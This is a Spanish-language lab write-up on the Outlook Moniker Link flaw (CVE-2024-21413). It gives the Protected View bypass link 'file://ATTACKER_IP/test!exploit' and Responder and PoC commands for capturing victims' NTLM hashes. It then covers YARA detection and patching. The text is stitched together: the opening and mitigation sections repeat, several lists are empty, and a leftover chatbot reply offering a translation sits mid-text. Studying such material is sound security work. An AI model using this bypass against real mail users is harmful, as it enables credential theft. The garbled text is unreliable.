
El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413, conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook.
El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413 y conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook.

Excelente 👍 A continuación se presenta una traducción completa redactada como informe de Penetration Testing (PT), en español profesional y claro. Como solicitaste – solo traducción y redacción. Las respuestas, capturas y detalles los agregarás tú; si lo deseas más adelante, te ayudaré.
El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413 y conocida como Moniker Link Vulnerability.
La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook mediante un enlace especial (Moniker Link), haciendo que el cliente Outlook de la víctima envíe sus credenciales de inicio de sesión (hash NTLM) a un servidor controlado por el atacante – sin ejecutar ningún archivo ni mostrar una advertencia de seguridad efectiva.
La vulnerabilidad puede conllevar a una filtración de credenciales e incluso existe la posibilidad teórica de ejecución remota de código (RCE).
| Parámetro | Valor |
|---|---|
| Identificador | CVE-2024-21413 |
| Fecha de publicación | 13 de febrero de 2024 |
| Descubridor | Haifei Li – Check Point Research |
| Impacto | Filtración de credenciales + posible RCE |
| Gravedad | Crítica |
| Complejidad de ataque | Baja |
| Puntuación CVSS | 9.8 |
| Enlace oficial | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
La vulnerabilidad afecta a las siguientes versiones:
(Descripción de la vulnerabilidad)
Microsoft Outlook permite mostrar correos electrónicos en formato HTML y analizar enlaces de diversos tipos, como http:// y https://. Además, Outlook también es compatible con enlaces especiales llamados Moniker Links, que permiten ejecutar aplicaciones o acceder a recursos externos del sistema operativo.
En condiciones normales, cuando un correo contiene un enlace que ejecuta una aplicación externa o accede a un recurso del sistema (como un enlace file://), se activa el mecanismo de seguridad Protected View de Outlook. Este mecanismo muestra una advertencia de seguridad y bloquea acciones peligrosas como la ejecución de código, macros o el acceso a recursos de red externos.
Sin embargo, se descubrió una vulnerabilidad en Outlook (CVE-2024-21413) que permite eludir el mecanismo Protected View mediante una simple manipulación de un enlace de tipo Moniker Link.
Durante la prueba se descubrió que el uso de un enlace normal del tipo:
file://ATTACKER_IP/test
hace que Outlook intente acceder a un recurso de red mediante el protocolo SMB, pero este intento es bloqueado por Protected View.
En cambio, cuando el enlace incluye el carácter especial ! y una cadena de texto adicional, por ejemplo:
file://ATTACKER_IP/test!exploit
Outlook no activa Protected View y realiza un intento de conexión al servidor remoto.
Durante este intento:
Es importante señalar que el recurso compartido remoto no tiene por qué existir realmente, ya que el intento de autenticación se realiza de todos modos.
La vulnerabilidad permite al atacante:
Además, dado que Moniker Links utiliza el mecanismo COM (Component Object Model) de Windows, existe la posibilidad teórica de ejecución remota de código (RCE). Sin embargo, hasta la fecha de la prueba, no existe un Proof of Concept público que demuestre RCE real mediante esta vulnerabilidad.
En el marco del ataque, se envía a la víctima un correo que contiene un Moniker Link similar al mostrado en la tarea anterior. El objetivo del atacante es crear un correo con un enlace Moniker Link que eluda el mecanismo Protected View de Outlook, de modo que cuando la víctima haga clic en el enlace, su cliente Outlook intente cargar un archivo desde la máquina del atacante. Esta acción provoca que el hash netNTLMv2 de la víctima se envíe y sea capturado por el atacante.
Antes de realizar el ataque, revisaremos un Proof of Concept (PoC) creado con fines de demostración (y también disponible en GitHub).
Autor: CMNatic | https://github.com/cmnatic Versión: 1.0 | 19/02/2024
El código utiliza el lenguaje Python y envía un correo HTML que contiene un enlace Moniker Link malicioso.
El PoC:
En un escenario real, se necesita un servidor SMTP controlado por el atacante (en esta sala, el servidor ya está proporcionado).
Después de enviar el correo, se debe ejecutar una herramienta de escucha como Responder en la máquina del atacante para capturar solicitudes SMB.
En THM AttackBox, el nombre de la interfaz es ens5:
responder -I ens5
Responder escucha solicitudes SMB, LLMNR y NBT-NS y permite capturar credenciales de autenticación.
En AttackBox:
Antes de ejecutar, realizar los siguientes ajustes:
10.64.165.67
Luego ejecutar:
python3 exploit.py
Cuando se solicite la contraseña, introducir:
attacker
Si la operación fue exitosa, se recibirá el mensaje:
Email delivered
Después de abrir el correo en la máquina de la víctima y hacer clic en el enlace "Click me":
El ataque se ha completado con éxito.
Se creó una regla YARA por Florian Roth cuyo objetivo es identificar correos que contengan el elemento file:\\ dentro de un Moniker Link – algo que podría indicar un intento de explotación de CVE-2024-21413.
Ejemplo de la regla YARA (tal como aparece en la sala):
La regla busca características generales de un correo (como Subject: y Received:)
y además busca un patrón sospechoso de enlace file:// que apunte a una ruta UNC (\\) junto con una extensión de archivo común, incluyendo el carácter ! al final (característica de la evasión de Protected View).
(El código en sí se mantiene tal como aparece en el original)
Además, se puede observar la solicitud SMB que sale de la máquina de la víctima hacia la máquina del atacante en una captura de paquetes (Packet Capture) en Wireshark.
Durante la solicitud:
Microsoft incluyó actualizaciones de seguridad para corregir esta vulnerabilidad en el marco de las actualizaciones Patch Tuesday de febrero. Se puede consultar la lista de artículos KB relevantes según la versión de Office en el enlace oficial de Microsoft.
Se recomienda encarecidamente actualizar Microsoft Office mediante:
Además, hasta que se completen las actualizaciones en todos los sistemas, esto sirve como un recordatorio importante para aplicar prácticas básicas de seguridad de la información, y en particular para aumentar la concienciación de los usuarios, como:
Dado que esta vulnerabilidad elude el mecanismo Protected View de Outlook, no es posible configurar Outlook para bloquear este ataque únicamente mediante cambios de configuración.
Asimismo, bloquear completamente el protocolo SMB no se recomienda en la mayoría de las organizaciones, ya que el protocolo es esencial para acceder a recursos de red y archivos compartidos. Sin embargo, es posible implementar bloqueos o restricciones a nivel de firewall, según la política organizacional y la estructura de la red.
Microsoft incluyó parches de seguridad para esta vulnerabilidad en el marco de las actualizaciones Patch Tuesday de febrero. Se puede consultar la lista de artículos KB relevantes según la versión de Office en el enlace oficial de Microsoft. Se recomienda encarecidamente actualizar Microsoft Office mediante:
Además, hasta que se implementen las actualizaciones en todos los sistemas, esto sirve como un recordatorio importante para aplicar prácticas básicas de seguridad de la información, y en particular para aumentar la concienciación de los usuarios, como:
Dado que esta vulnerabilidad elude el mecanismo Protected View de Outlook, no es posible prevenir el ataque mediante cambios de configuración dentro del propio Outlook.
Asimismo, el bloqueo completo del protocolo SMB no se recomienda en la mayoría de las organizaciones, ya que el protocolo es esencial para acceder a archivos compartidos y recursos de red. Sin embargo, es posible implementar restricciones o bloqueos a nivel de firewall, según la política de seguridad y la estructura de la red corporativa.